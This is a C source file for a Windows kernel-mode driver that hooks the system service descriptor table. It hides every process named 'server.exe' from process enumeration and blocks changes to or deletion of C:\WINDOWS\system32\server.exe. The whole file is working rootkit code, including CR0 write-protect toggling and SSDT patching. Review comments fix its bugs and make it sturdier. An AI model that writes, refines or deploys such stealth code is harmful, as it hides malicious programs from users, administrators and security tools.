/* ******************************************************************
文件:PorcessHide.c
挂钩80x86 CPU,WIN2K或更高版本的系统服务表,这个驱动用来隐藏指定进程
和防止删除文件的
code by gt2333588 from SEU (02/26/2006)
****************************************************************** */
/*包含的头文件*/
#include <ntddk.h>
#include "SYS.h"
/* ******************************************************************
Macro for easy hook/unhook. On X86 implementations of Zw* func-
tions, the DWORD following the first byte is the system call number,
so we reach into the Zw function passed as a parameter, and pull the
number out. This makes system call hooking dependent ONLY on the
Zw* function implementation not changing.
****************************************************************** */
/* SSDT slot (lvalue) for a Zw* service. Relies on the x86 stub layout described
 * above: the DWORD at offset 1 of the stub is the service index, so the macro is
 * only meaningful for the x86 builds this file targets (see file header). */
#define SYSCALL(_function) ServiceTable->ServiceTable[*(PULONG)((PUCHAR)_function+1)]
/* Pointer to the system global service table; DriverEntry sets it from the
 * KeServiceDescriptorTable export before any hook is installed. */
PSRVTABLE ServiceTable;
#pragma code_seg("SETHOOK")
/* Install System Call Hook */
/*
 * Redirect the two SSDT slots this driver filters. Must run with CR0.WP
 * cleared (the caller, DriverEntry, handles that); the table page is
 * otherwise read-only.
 *
 * The genuine dispatchers are captured into RealZw* before either slot is
 * overwritten, because both the hooks and UnhookSystemCall depend on them.
 */
VOID HookSystemCall()
{
	/* On x86 every Zw* stub begins with "mov eax, <service number>", so the
	 * DWORD at offset 1 is the SSDT index (same trick as the SYSCALL macro). */
	ULONG idxQuerySystemInformation = *(PULONG)((PUCHAR)ZwQuerySystemInformation + 1);
	ULONG idxSetInformationFile = *(PULONG)((PUCHAR)ZwSetInformationFile + 1);

	/* Save the originals first. */
	RealZwQuerySystemInformation = ServiceTable->ServiceTable[idxQuerySystemInformation];
	RealZwSetInformationFile = ServiceTable->ServiceTable[idxSetInformationFile];

	/* Then point both services at the filtering versions in this driver. */
	ServiceTable->ServiceTable[idxQuerySystemInformation] = (PVOID)HookZwQuerySystemInformation;
	ServiceTable->ServiceTable[idxSetInformationFile] = (PVOID)HookZwSetInformationFile;
}
#pragma code_seg()
#pragma code_seg("UNHOOK")
/* Uninstall System Call Hook */
/*
 * Put the saved dispatchers back into their SSDT slots. Mirrors
 * HookSystemCall and, like it, assumes the caller has cleared CR0.WP.
 * Writes back whatever RealZw* holds; it does not check that the slots
 * still contain this driver's hooks.
 */
VOID UnhookSystemCall()
{
	/* Same index derivation as the SYSCALL macro: DWORD after the stub's first byte. */
	ULONG idxQuerySystemInformation = *(PULONG)((PUCHAR)ZwQuerySystemInformation + 1);
	ULONG idxSetInformationFile = *(PULONG)((PUCHAR)ZwSetInformationFile + 1);

	ServiceTable->ServiceTable[idxQuerySystemInformation] = (PVOID)RealZwQuerySystemInformation;
	ServiceTable->ServiceTable[idxSetInformationFile] = (PVOID)RealZwSetInformationFile;
}
#pragma code_seg()
#pragma code_seg("ENTRY")
/* Driver Entry */
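/*
 * Driver entry point: creates the \Device\WinHook control device and its
 * \DosDevices\WinHook link, registers the dispatch/unload routines, then
 * patches the SSDT so ZwQuerySystemInformation and ZwSetInformationFile
 * go through this driver's hooks.
 *
 * DriverObject: driver object supplied by the I/O manager.
 * RegistryPath: unused.
 * Returns STATUS_SUCCESS, or the failing IoCreate* status (nothing is left
 * behind on failure).
 *
 * Fixes over the original: lpHookDeviceObject was read uninitialised on the
 * failure path, IoDeleteSymbolicLink was called for a link that was never
 * created, and the CR0.WP window was left open to preemption.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
	NTSTATUS nRet;
	PDEVICE_OBJECT lpHookDeviceObject = NULL;
	UNICODE_STRING uszDeviceName, uszDriverName;

	RtlInitUnicodeString(&uszDeviceName, L"\\Device\\WinHook");
	RtlInitUnicodeString(&uszDriverName, L"\\DosDevices\\WinHook");

	/* Control device. NOTE(review): no security descriptor is applied here, so
	 * the default DACL for this custom device type decides who may open
	 * \\.\WinHook; IoCreateDeviceSecure would make that explicit. */
	nRet = IoCreateDevice(DriverObject, 0, &uszDeviceName, FILE_DEVICE_WINHOOK,
		0, TRUE, &lpHookDeviceObject);
	if (!NT_SUCCESS(nRet)) {
		DbgPrint("******WinHook:Failed to create device!******\n");
		return nRet;
	}

	/* User-mode name for the device. On failure only the device exists yet. */
	nRet = IoCreateSymbolicLink(&uszDriverName, &uszDeviceName);
	if (!NT_SUCCESS(nRet)) {
		DbgPrint("******WinHook:Failed to create device!******\n");
		IoDeleteDevice(lpHookDeviceObject);
		return nRet;
	}

	/* One handler for every major we care about; see DriverDispatch. */
	DriverObject->MajorFunction[IRP_MJ_CREATE] =
	DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
	DriverObject->MajorFunction[IRP_MJ_CLOSE] =
	DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDispatch;
	DriverObject->DriverUnload = DriverUnload;

	/* KeServiceDescriptorTable is an ntoskrnl export on the x86 builds this
	 * file targets (see file header). */
	ServiceTable = KeServiceDescriptorTable;
	DbgPrint("WinHook:SystemCallService: %p\n", ServiceTable);

	/* The SSDT lives on a read-only page; clearing CR0.WP lets ring 0 write it.
	 * Interrupts stay off from the clear to the restore so this thread cannot
	 * be preempted and resumed on another CPU whose CR0 still has WP set (the
	 * write in HookSystemCall would then fault). Nothing else - no DbgPrint -
	 * runs inside the window. WP is set unconditionally afterwards rather than
	 * restored, which assumes it was set on entry. */
	__asm
	{
		push eax
		cli
		mov eax, CR0
		and eax, 0FFFEFFFFh   ; clear bit 16 (WP)
		mov CR0, eax
		pop eax
	}
	HookSystemCall();
	__asm
	{
		push eax
		mov eax, CR0
		or eax, 10000h        ; set WP again
		mov CR0, eax
		sti
		pop eax
	}
	DbgPrint("******WinHook:Hook System Call Service******\n");

	return STATUS_SUCCESS;
}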
#pragma code_seg()
#pragma code_seg("PATCH")
/* Driver Dispatch */
/*
 * Single dispatch routine for create/shutdown/close/device-control IRPs.
 * Every request - including any IOCTL from any caller that can open the
 * control device - is completed with STATUS_SUCCESS and zero bytes of
 * output; no request is acted upon, so nothing in the IRP is validated.
 * The DbgPrint is the only observable side effect.
 *
 * Always returns STATUS_SUCCESS.
 */
NTSTATUS DriverDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
	PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
	UCHAR major = stack->MajorFunction;

	/* These are the only majors DriverEntry routes here. IRP_MJ_SHUTDOWN is
	 * registered as a handler, but no IoRegisterShutdownNotification call is
	 * visible in this file, so that case presumably never fires. */
	if (major == IRP_MJ_CREATE || major == IRP_MJ_SHUTDOWN ||
	    major == IRP_MJ_CLOSE || major == IRP_MJ_DEVICE_CONTROL) {
		DbgPrint("WinHook Dispatch\n");
	}

	Irp->IoStatus.Status = STATUS_SUCCESS;
	Irp->IoStatus.Information = 0;
	IoCompleteRequest(Irp, IO_NO_INCREMENT);
	return STATUS_SUCCESS;
}
#pragma code_seg()
#pragma code_seg("UNLOAD")
/* Driver unload */
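/*
 * Unload routine: restores the two SSDT slots, then removes the symbolic
 * link and the control device.
 *
 * Fix over the original: the CR0.WP window now runs with interrupts off and
 * contains only the table write (the original also ran DbgPrint, the link
 * deletion and the device deletion with WP cleared and preemption possible).
 *
 * NOTE(review): two issues remain unaddressed. UnhookSystemCall writes the
 * pointers saved at load time back blindly, so any driver that hooked the
 * same slots after this one is silently unhooked as well; and a call still
 * executing inside HookZw* when the image is unmapped has no in-flight
 * counter protecting it.
 */
VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
	UNICODE_STRING uszDriverName;

	DbgPrint("******WinHook Driver Unloading******\n");

	/* Same CR0.WP handling as DriverEntry: clear WP, patch, set WP, with
	 * interrupts disabled so the thread cannot migrate to another CPU
	 * mid-patch. */
	__asm
	{
		push eax
		cli
		mov eax, CR0
		and eax, 0FFFEFFFFh   ; clear bit 16 (WP)
		mov CR0, eax
		pop eax
	}
	UnhookSystemCall();
	__asm
	{
		push eax
		mov eax, CR0
		or eax, 10000h        ; set WP again
		mov CR0, eax
		sti
		pop eax
	}

	/* Tear down the user-visible name, then the device itself. */
	RtlInitUnicodeString(&uszDriverName, L"\\DosDevices\\WinHook");
	IoDeleteSymbolicLink(&uszDriverName);
	IoDeleteDevice(DriverObject->DeviceObject);
	DbgPrint("******Deleted devices******\n");
}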
#pragma code_seg()
#pragma code_seg("HOOK")
/* Hook function: replaces ZwQuerySystemInformation to hide the configured process. */
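/*
 * SSDT replacement for ZwQuerySystemInformation. Lets the real service fill
 * the caller's buffer, then, for SystemProcessInformation (class 5), unlinks
 * every entry whose image name is "server.exe" so process enumerators do not
 * see it. Any process with that image name is hidden, not only the one at the
 * path protected by HookZwSetInformationFile.
 *
 * Entries form a singly linked list inside the buffer: NextEntryDelta is the
 * byte offset to the next entry and 0 marks the last one. An entry is hidden
 * by adding its delta to the previous entry's delta (or terminating the
 * previous entry when the hidden one was last).
 *
 * Parameters and return value are those of the native service; the status
 * is whatever RealZwQuerySystemInformation returned.
 *
 * Fixes over the original:
 *  - after unlinking an entry the loop advanced twice, so the entry following
 *    a hidden one was never compared;
 *  - the first entry was skipped without recording it as lpPrev, so the
 *    second entry could never be unlinked (the branch that tried modified
 *    only the local SystemInformation copy - a no-op, dropped here);
 *  - the walk is now bounded by SystemInformationLength. NextEntryDelta is
 *    read from the caller's buffer, which for a user-mode caller is user
 *    memory another thread can rewrite; an out-of-range delta now stops the
 *    walk instead of steering kernel reads and writes outside the buffer.
 *
 * The first entry is never unlinked: the list head is the buffer start
 * itself and cannot be re-pointed. In practice it is the Idle process, whose
 * name does not match.
 */
NTSTATUS HookZwQuerySystemInformation(
	IN ULONG SystemInformationClass,
	IN PVOID SystemInformation,
	IN ULONG SystemInformationLength,
	OUT PULONG ReturnLength
	)
{
	NTSTATUS nRet;
	UNICODE_STRING uszProcName;
	struct _SYSTEM_PROCESSES *lpCurr;
	struct _SYSTEM_PROCESSES *lpPrev;
	PUCHAR lpEnd;

	RtlInitUnicodeString(&uszProcName, L"server.exe");

	nRet = RealZwQuerySystemInformation(SystemInformationClass,
		SystemInformation, SystemInformationLength, ReturnLength);

	/* Only the process list (class 5) is filtered, and only when the real
	 * service actually produced it. */
	if (!NT_SUCCESS(nRet) || SystemInformationClass != 5 || SystemInformation == NULL) {
		return nRet;
	}

	lpEnd = (PUCHAR)SystemInformation + SystemInformationLength;
	lpPrev = NULL;
	lpCurr = (struct _SYSTEM_PROCESSES *)SystemInformation;

	while (lpCurr != NULL && (PUCHAR)lpCurr + sizeof(*lpCurr) <= lpEnd) {
		struct _SYSTEM_PROCESSES *lpNext = NULL;

		if (lpCurr->NextEntryDelta != 0) {
			lpNext = (struct _SYSTEM_PROCESSES *)((PUCHAR)lpCurr + lpCurr->NextEntryDelta);
			/* A delta that does not move forward inside the buffer is corrupt
			 * or hostile: stop rather than touch memory we were not given. */
			if ((PUCHAR)lpNext <= (PUCHAR)lpCurr || (PUCHAR)lpNext >= lpEnd) {
				break;
			}
		}

		if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, TRUE) == 0) {
			if (lpPrev != NULL) {
				/* Splice lpCurr out: lpPrev now jumps to lpNext, or terminates. */
				if (lpNext != NULL) {
					lpPrev->NextEntryDelta += lpCurr->NextEntryDelta;
				}
				else {
					lpPrev->NextEntryDelta = 0;
				}
			}
			/* lpPrev deliberately unchanged: the hidden entry is no longer
			 * reachable, so the entry before it stays the predecessor. */
		}
		else {
			lpPrev = lpCurr;
		}

		lpCurr = lpNext;
	}

	return nRet;
}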
#pragma code_seg()
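/*
 * SSDT replacement for ZwSetInformationFile. If FileHandle refers to
 * \WINDOWS\system32\server.exe on volume C:, the call is refused with
 * STATUS_ACCESS_DENIED; otherwise it is passed to the real service
 * unchanged. Every information class is refused for that file, which is
 * wider than the "prevent deletion" (FileDispositionInformation) the file
 * header describes - kept as the original behaved.
 *
 * Only this exact path and volume match: other names for the same file
 * (a short 8.3 path, a hard link) are not recognised.
 *
 * Fixes over the original:
 *  - the reference taken by ObReferenceObjectByHandle was never released,
 *    leaking one file-object reference per call;
 *  - FILE_OBJECT.FileName and the DOS name are counted UNICODE_STRINGs, not
 *    guaranteed NUL-terminated, so _wcsicmp on their Buffer could read past
 *    the string (and FileName.Buffer may be NULL); counted compares are used;
 *  - the handle is resolved in the caller's previous mode, so a user-mode
 *    caller cannot make the hook dereference a kernel handle it does not own.
 *
 * Parameters and return value are those of the native service.
 */
NTSTATUS HookZwSetInformationFile(IN HANDLE FileHandle,
	OUT PIO_STATUS_BLOCK IoStatusBlock,
	IN PVOID FileInformation,
	IN ULONG Length,
	IN FILE_INFORMATION_CLASS FileInformationClass)
{
	PFILE_OBJECT pFileObject = NULL;
	NTSTATUS nRet;
	BOOLEAN bProtected = FALSE;

	nRet = ObReferenceObjectByHandle(FileHandle, GENERIC_READ, *IoFileObjectType,
		ExGetPreviousMode(), (PVOID *)&pFileObject, NULL);
	if (NT_SUCCESS(nRet)) {
		UNICODE_STRING uDosName;

		if (pFileObject->DeviceObject != NULL &&
		    NT_SUCCESS(IoVolumeDeviceToDosName(pFileObject->DeviceObject, &uDosName))) {
			UNICODE_STRING uProtectedPath;
			UNICODE_STRING uProtectedVolume;

			RtlInitUnicodeString(&uProtectedPath, L"\\WINDOWS\\system32\\server.exe");
			RtlInitUnicodeString(&uProtectedVolume, L"C:");

			/* Case-insensitive, length-bounded compares. */
			bProtected = RtlEqualUnicodeString(&pFileObject->FileName, &uProtectedPath, TRUE) &&
				RtlEqualUnicodeString(&uDosName, &uProtectedVolume, TRUE);

			/* IoVolumeDeviceToDosName allocates the DOS name; caller frees it. */
			ExFreePool(uDosName.Buffer);
		}

		/* Balance the reference taken above. */
		ObDereferenceObject(pFileObject);
	}

	if (bProtected) {
		return STATUS_ACCESS_DENIED;
	}

	return RealZwSetInformationFile(FileHandle, IoStatusBlock, FileInformation,
		Length, FileInformationClass);
}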